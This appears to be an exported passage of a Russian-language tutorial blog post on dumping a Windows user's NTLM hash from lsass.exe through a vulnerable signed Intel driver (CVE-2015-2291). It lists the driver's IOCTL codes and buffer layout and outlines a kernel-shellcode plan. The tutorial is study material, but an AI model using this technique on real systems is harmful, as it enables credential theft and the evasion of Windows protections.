\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u043c\u0443 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043d\u0435 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430. \u0423\u0437\u043d\u0430\u043b, \u043a\u0430\u043a \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f NTLM hash \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 lsass.exe \u0438 \u043a\u0430\u043a \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0430\u044f \u043f\u0430\u043c\u044f\u0442\u044c \u0432 user-mode. <\/p>\n<p>\u0421 \u0438\u0441\u0445\u043e\u0434\u043d\u0438\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u043e\u0436\u043d\u043e \u043e\u0437\u043d\u0430\u043a\u043e\u043c\u0438\u0442\u0441\u044f \u043d\u0430 <a href=\"https:\/\/github.com\/roman5888\/shor\/tree\/main\">github<\/a>.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"v-portal\" style=\"display:none;\"><\/div>\n<\/div>\n<p> <!----> <!----><br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/company\/pm\/blog\/649689\/\"> https:\/\/habr.com\/ru\/company\/pm\/blog\/649689\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e \u0432\u0430\u0441, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u0438! \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c NTLM hash \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. NTLM hash \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows. \u041f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.<\/p>\n<p>\u041f\u043e \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u0435 \u044f \u043d\u0430\u0448\u0435\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439:<\/p>\n<ol>\n<li>\n<p><a href=\"https:\/\/adepts.of0x.cc\/physical-graffiti-lsass\/\">A physical graffiti of LSASS: getting credentials from physical memory for fun and learning.<\/a> <\/p>\n<\/li>\n<li>\n<p><a href=\"https:\/\/blog.vincss.net\/2021\/08\/ex007-how-playing-cs-go-helped-you-bypass-security-products.html\">[EX007] How playing CS: GO helped you bypass security products.<\/a> <\/p>\n<\/li>\n<\/ol>\n<p>\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u0432 \u044d\u0442\u0438 \u0441\u0442\u0430\u0442\u044c\u0438, \u0443 \u043c\u0435\u043d\u044f \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0436\u0435\u043b\u0430\u043d\u0438\u0435 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u0438\u0445 \u0434\u043b\u044f \u043b\u0443\u0447\u0448\u0435\u0433\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u043c\u0435\u0442\u043e\u0434\u0430 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM hash\u2019\u0430 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<p><strong>\u0412\u0430\u0436\u043d\u044b\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043d\u0438\u044f<\/strong>: <\/p>\n<ul>\n<li>\n<p>\u0412\u0441\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430<strong> Windows 10 \u0432\u0435\u0440\u0441\u0438\u0438 1909<\/strong> \u0441\u0431\u043e\u0440\u043a\u0430 18363.1556.<\/p>\n<\/li>\n<li>\n<p>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438 \u0431\u0443\u0434\u0435\u0442 <strong>shor.exe<\/strong>.\u00a0 <\/p>\n<\/li>\n<\/ul>\n<h2>\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435.<\/h2>\n<p>\u0412 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows \u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0435\u0441\u0442\u044c \u0434\u0432\u0430 \u0440\u0435\u0436\u0438\u043c\u0430 \u0440\u0430\u0431\u043e\u0442\u044b \u2014 \u00abuser-mode\u00bb \u0438 \u00abkernel-mode\u00bb. \u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0440\u0435\u0436\u0438\u043c\u044b \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u0441\u043e\u0431\u043e\u0439 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows.<\/p>\n<p>\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0440\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u00abuser-mode\u00bb \u0438 \u00abkernel-mode\u00bb:<\/p>\n<ul>\n<li>\n<p>\u041a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0432 user-mode, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e. \u0418\u0437-\u0437\u0430 \u044d\u0442\u043e\u0433\u043e \u043e\u0434\u0438\u043d \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0435 \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443. \u041f\u043e\u043c\u0438\u043c\u043e \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0432 user-mode \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c, \u043e\u043d\u043e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043e. \u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0432 user-mode \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. <\/p>\n<\/li>\n<li>\n<p>\u041a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0432 kernel-mode, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0434\u043d\u043e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440 kernel-mode \u043d\u0435 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432 \u0438 \u0441\u0430\u043c\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. <\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a lsass.exe \u0432 user-mode, \u043c\u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c \u0432 kernel-mode.<\/p>\n<p>\u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NTLM hash \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u044f \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043b\u0430\u043d \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439:<\/p>\n<ol>\n<li>\n<p>\u041d\u0430\u0439\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0434\u0440\u0430\u0439\u0432\u0435\u0440 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode. <\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0437 kernel-mode \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 <a href=\"https:\/\/www.ired.team\/miscellaneous-reversing-forensics\/windows-kernel-internals\/how-kernel-exploits-abuse-tokens-for-privilege-escalation#_eprocess\">EPROCESS<\/a> \u0434\u043b\u044f \u0434\u0432\u0443\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 lsass.exe \u0438 shor.exe. \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 <a href=\"http:\/\/www.codewarrior.cn\/ntdoc\/wrk\/mm\/MmCopyVirtualMemory.htm\">MmCopyVirtualMemory<\/a>, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0432\u043b\u0435\u0447\u044c\u00a0 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0437 user-mode.<\/p>\n<\/li>\n<li>\n<p>\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-hardware\/drivers\/debugger\/-vad\">VAD<\/a> (Virtual Address Descriptor) \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 kernel-mode, \u043d\u0430\u0439\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 user-mode, \u0434\u043b\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory.<\/p>\n<\/li>\n<li>\n<p>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c <a href=\"https:\/\/codeby.net\/threads\/hello-world-v-vide-shell-koda-osobennosti-napisanija-shell-kodov.76477\/\">shellcode<\/a> \u0434\u043b\u044f kernel-mode, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044e MmCopyVirtualMemory. <\/p>\n<\/li>\n<li>\n<p>\u0418\u0437\u0432\u043b\u0435\u0447\u044c NTLM hash \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<\/ol>\n<h2>1. \u041f\u043e\u0438\u0441\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430.<\/h2>\n<p>\u041f\u043e\u0438\u0441\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u043e\u0431\u043b\u0430\u0434\u0430\u044e\u0449\u0435\u0433\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode, \u043f\u0440\u0438\u0432\u0451\u043b \u043c\u0435\u043d\u044f \u043a \u043f\u0440\u043e\u0435\u043a\u0442\u0443 <a href=\"https:\/\/github.com\/hfiref0x\/KDU\">KDU<\/a>. \u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0435\u043a\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043d\u0435 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445, \u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432. \u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432: <strong>iqvw64e.sys<\/strong>.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u0412 README.md \u043f\u0440\u043e\u0435\u043a\u0442\u0430 KDU \u0435\u0441\u0442\u044c \u043d\u043e\u043c\u0435\u0440 CVE <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2015-2291\">2015-2291<\/a> \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430. \u0412 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0438 \u0441\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u044f\u0434\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0432\u044b\u0437\u043e\u0432\u0430 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/devio\/device-input-and-output-control-ioctl-\">IOCTL<\/a> 0x80862013, 0x8086200B, 0x8086200F \u0438\u043b\u0438 0x80862007.<\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0432\u044b\u0431\u043e\u0440\u0430 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u043e\u0435\u043a\u0442 \u043d\u0430 github \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c <a href=\"https:\/\/github.com\/Tare05\/Intel-CVE-2015-2291\">Intel-CVE-2015-2291<\/a>. \u0418\u0437 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0432\u0437\u044f\u043b \u043a\u043e\u0434 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0438\u0437 user-mode \u0441 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c kernel-mode:<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<details class=\"spoiler\">\n<summary> \u0420\u0430\u0437\u0431\u043e\u0440 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c<\/summary>\n<div class=\"spoiler__content\">\n<p>\u041f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 IOCTL 0x80862007 \u0432 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/ioapiset\/nf-ioapiset-deviceiocontrol\">DeviceIoControl<\/a>.   <\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0443\u0444\u0435\u0440 \u0432 DeviceIoControl.<\/p>\n<p>QWORD switch_num (a1) \u2014 \u043d\u043e\u043c\u0435\u0440 \u0432 switch.<\/p>\n<p>QWORD (a1+8) \u2014 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f.<\/p>\n<p>QWORD sourse (a1+16) \u2014 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0431\u043b\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a.<\/p>\n<p>QWORD dest (a1+24) \u2014 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0431\u043b\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f.<\/p>\n<p>QWORD count (a1+32) \u2014 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e<br \/> \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442\u043e\u0432.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u0424\u0443\u043d\u043a\u0446\u0438\u044f <a href=\"http:\/\/cppstudio.com\/post\/682\/\">memmove<\/a> \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<\/div>\n<\/details>\n<h2>2. \u041f\u043e\u0438\u0441\u043a EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe.<\/h2>\n<p>\u041a\u0430\u0436\u0434\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d <a href=\"https:\/\/www.vergiliusproject.com\/kernels\/x64\/Windows%2010%20%7C%202016\/1909%2019H2%20(November%202019%20Update)\/_EPROCESS\">\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439<\/a> EPROCESS. \u042d\u0442\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043a \u0432\u0435\u0440\u0441\u0438\u0438 Windows NT, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043d\u0435 \u0431\u0443\u0434\u0443 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u044c \u0435\u0451 \u0446\u0435\u043b\u0438\u043a\u043e\u043c, \u0430 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0443\u0436\u043d\u044b\u0435 \u043c\u043d\u0435 \u0447\u0430\u0441\u0442\u0438.   <\/p>\n<p>ActiveProcessLinks (<a href=\"https:\/\/www.ired.team\/miscellaneous-reversing-forensics\/windows-kernel-internals\/manipulating-activeprocesslinks-to-unlink-processes-in-userland#_list_entry\">LIST_ENTRY<\/a>) \u2013 \u044d\u0442\u043e \u044d\u043b\u0435\u043c\u0435\u043d\u0442 \u0434\u0432\u0443\u0445\u0441\u0432\u044f\u0437\u043d\u043e\u0433\u043e \u0441\u043f\u0438\u0441\u043a\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 FLink (\u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows) \u0438 BLink (\u043d\u0430 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows):<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>ImageFileName \u2013 \u0438\u043c\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>VadRoot \u2013 AVL \u0434\u0435\u0440\u0435\u0432\u043e \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 VAD (Virtual Address Descriptor).   <\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>VadCount \u2013 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u0437\u043b\u043e\u0432 \u0432 AVL \u0434\u0435\u0440\u0435\u0432\u0435.<\/p>\n<figure class=\"full-width\"><figcaption><\/figcaption><\/figure>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0437\u0431\u043e\u0440\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b, \u044f \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b \u043a 